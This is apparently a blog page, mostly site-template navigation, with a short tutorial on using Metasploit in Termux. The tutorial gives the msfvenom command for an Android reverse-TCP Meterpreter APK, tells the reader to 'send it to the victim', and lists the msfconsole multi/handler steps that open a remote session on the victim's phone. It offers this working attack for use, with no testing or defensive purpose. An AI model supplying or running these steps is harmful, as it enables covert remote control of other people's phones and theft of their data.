r2jyMycKRSdl6wynCKBldYdZWuL4bEvNr0iZ3Ycy

Tag Populer

Label

Kategori

Iklan

Iklan

Politics
Lihat Semua

Artikel Pilihan

Technology
Lihat Semua

Fashion
Lihat Semua

Sports
Lihat Semua

Entertainment
Lihat Semua

Artikel Pilihan

Bolasport

Populer Tahun ini

Photos
Lihat Semua

Populer Minggu ini

Populer Bulan ini

Indeks Berita

Label

Label Mobile

Contact Form

Name

Email *

Message *

Channels TV
Lihat Semua

Indonesian Channels Blogger Template

Indonesian Channels Blogger Template
Indonesian Channels Blogger Template

Headline

Labels

Jelajahi

Kategori

Notification

Pages

Last Year

Popular Posts

Trending Now

Popular Posts

Last Week

Last Month

Bookmark
Billboard ads

How To Generate A Payload Using Metasploit Framework in Termux


Today we'll show to you guys how to create a payload using metasploit framework in termux.

first you need to install metasploit.
we made a little tool for that, or you can just type:
- pkg install unstable repo && pkg install metasploit

STEPS:

open termux and type:

msfvenom -p android/meterpreter/reverse_tcp LPORT=4444 LHOST=your IP R >/sdcard/name.apk

after some seconds it will be appear  a little message that show the payload's size.

check in the file manager on the internal storage.

you'll see the payload, just send it to the victim or install the payload in a phone.

then, open termux and type:


-msfconsole

-use multi/handler

-set payload android/meterpreter/reverse_tcp

-set lport 4444

-set lhost your IP

-exploit

the job is done boys, when the meterpreter session is opened just type help to see what you can do.